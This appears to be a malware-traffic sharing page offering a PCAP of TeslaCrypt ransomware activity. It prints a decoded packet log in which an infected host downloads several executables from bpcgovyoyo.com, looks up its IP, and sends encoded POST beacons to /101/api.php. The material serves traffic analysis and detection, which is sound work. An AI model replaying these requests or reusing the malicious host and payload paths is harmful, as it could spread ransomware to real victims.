Tesla TeslaCrypt Ransomware Malware bpcgovyoyo.com POST /101/api.php PCAP File Download Traffic Analysis

Download Attachments

  • 1 pcap nv4
    Date added: November 30, 2017 2:54 am Added by: admin File size: 119 KB Downloads: 22


46 engines detected this file

2017-11-29 19:41:47.972453 IP 192.168.1.102.50978 > 101.99.69.129.80: Flags [P.], seq 2262608480:2262608969, ack 633486147, win 256, length 489: HTTP: GET /serv/nv4.exe HTTP/1.1
E…o.@….>…fecE..”.P…`%.;CP…….GET /serv/nv4.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bpcgovyoyo.com/serv/nv4.exe
Connection: Keep-Alive

2017-11-29 19:42:15.366472 IP 192.168.1.102.50979 > 101.99.69.129.80: Flags [P.], seq 2844807322:2844807811, ack 746564504, win 256, length 489: HTTP: GET /serv/nv2.exe HTTP/1.1
E…q(@……..fecE..#.P..P.,…P…Hx..GET /serv/nv2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bpcgovyoyo.com
Connection: Keep-Alive

2017-11-29 19:42:32.665761 IP 192.168.1.102.50980 > 101.99.69.129.80: Flags [P.], seq 1569128606:1569129094, ack 3125156784, win 256, length 488: HTTP: GET /serv/me.exe HTTP/1.1
E…r.@….j…fecE..$.P]….F..P…_j..GET /serv/me.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bpcgovyoyo.com
Connection: Keep-Alive

2017-11-29 19:42:56.666099 IP 192.168.1.102.50981 > 216.146.43.70.80: Flags [P.], seq 2884055042:2884055110, ack 1749298093, win 64240, length 68: HTTP: GET / HTTP/1.1
E..l5z@….*…f..+F.%.P..0.hD+.P…K…GET / HTTP/1.1
Host: checkip.dyndns.org
Connection: Keep-Alive

2017-11-29 19:42:58.076406 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 2817173057:2817173343, ack 2706750449, win 256, length 286: HTTP: POST /101/api.php HTTP/1.1
E..Fs.@……..fecE..&.P…A.U..P…Q…POST /101/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: bpcgovyoyo.com
Content-Length: 304
Expect: 100-continue
Connection: Keep-Alive

2017-11-29 19:42:58.443173 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 286:590, ack 1, win 256, length 304: HTTP
E..Xs.@……..fecE..&.P…_.U..P…….p=G1DZYwdIiDZ6V83seaZCmTmrH8bGtgoAAlt2qbVLnOyLjStMeUj5EDMrAykz7X6XKWP2MQdaG4Z7TYTe647jEdqYLYuTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDQSkgdgaDtY1OFOz8Pf/8DAB3/CA8eXFff4DpgX10NLp
2017-11-29 19:42:59.175776 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 590:852, ack 282, win 255, length 262: HTTP: POST /101/api.php HTTP/1.1
E…s.@….&…fecE..&.P…..U.
P…Nt..POST /101/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: bpcgovyoyo.com
Content-Length: 338
Expect: 100-continue

2017-11-29 19:42:59.447385 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 852:1190, ack 307, win 255, length 338: HTTP
E..zs.@……..fecE..&.P…..U.#P…_m..p=BEmO9zSQxPNbRWmt35dl4fby5EvpaDK6uvhnbpxEgc7Z7PyGZmOB/yDUXzbJplLU%2Bq5yZiJajbjVWTYJPdYVIkW5Tm2SdQs0QiT9WQvdrBGOJC1QobboYGKHWBBhNYG4iG3Y13rxlbCqR9kStLyM0ZUkcQKj11BudorK5fZ6UnnxWGG2N47xMTXHOG06O%2BtXV2jAVMKhsnLYJNncDHiM4Ed/BTDvYfcRRc9KYJjOkEV0zU5SIVgNldNQsIHvAP59EZ40BrlZCpT1eLkDmBH1SpZl2lDK3erEKpyuyato2kMDmgStDRvOG5yWeCqBClskwgOn6IMrW48=
2017-11-29 19:43:00.579911 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 1190:1452, ack 508, win 254, length 262: HTTP: POST /101/api.php HTTP/1.1
E…s.@….#…fecE..&.P…..U..P…J;..POST /101/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: bpcgovyoyo.com
Content-Length: 348
Expect: 100-continue

2017-11-29 19:43:00.835111 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 1452:1800, ack 533, win 254, length 348: HTTP
E…s.@……..fecE..&.P…..U..P…dL..p=EmZKrUTp3d4tHBRf%2BrVRl7iPcurRnBIe9ULxvMHZkPpi4S2ymyuLC7cWqmW4kObQZ%2ByigMKliGI0m/iQBuFuE0oj6eTxgPI2nB%2BCB6bF/nnf/NzEyQQBzGvCoRPg8UF5NFAAmVSq6JIcnNE33tg08yYqY30loz7e6nCaPgwHTQ7A5Oskuu92NpAhJTEMTeCPaXqGuJ2OoDeECs1S06j17MZ6CGT9IaIuBNIld7lvDDcglZKIcI1y6slZiZWU/OsPKY0koezcvb5OMolYj0aGWWubd6AOJz%2B4MkR32N8/M%2B2/14xE/aM/T/oLI%2B%2BzWx4NpyQ8EYpeens=
2017-11-29 19:43:03.870462 IP 192.168.1.102.50983 > 101.99.69.129.80: Flags [P.], seq 241649466:241649956, ack 21904899, win 256, length 490: HTTP: GET /serv/frv2.exe HTTP/1.1
E…s.@….9…fecE..’.P.gG:.N>.P….O..GET /serv/frv2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bpcgovyoyo.com
Connection: Keep-Alive

2017-11-29 19:43:07.095789 IP 192.168.1.102.50984 > 101.99.69.129.80: Flags [P.], seq 3343248182:3343248444, ack 771995862, win 256, length 262: HTTP: POST /101/api.php HTTP/1.1
E…tL@……..fecE..(.P.E.6….P…e…POST /101/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: bpcgovyoyo.com
Content-Length: 314
Expect: 100-continue

2017-11-29 19:43:07.348650 IP 192.168.1.102.50984 > 101.99.69.129.80: Flags [P.], seq 262:576, ack 26, win 256, length 314: HTTP
E..bt_@….D…fecE..(.P.E.<….P…^Q..p=F0ZNqdxq2I/la8QaFAPjijmrH8bGtgoAAlt2qbVLnOyLjStMeUj5EDMrAykz7X6XKWP2MQdaG4Z7TYTe647jEXZ8iPkGx9o6AboTLtKFE8XUfePVFUVPdE6nJpbZK8wKkRnCzAVzEv6jX24nEj/A3t/AswHfHfQa06OpxXNTPbcdPkaO1l3rUXSB5JlTDEnqh/hK6DO8rbTZeRrpi47Mq2zpyXEr/M/ZVXllPgf09svD8fSEnRpoQ/Yi5M1vR0sGIyHs9UzQYKgMCTyR22BDjCDmB42gUoJPjcbnAO8lyNkq/1WthMdFeg==

 

SHA-256 666e43d330727d7c0313b300a768d6cea2da6bdae80cf2675f1ad4e02fd81589
File name output.112494122.txt
File size 1.01 MB
Last analysis 2017-11-29 03:05:38 UTC

 

Leave a Reply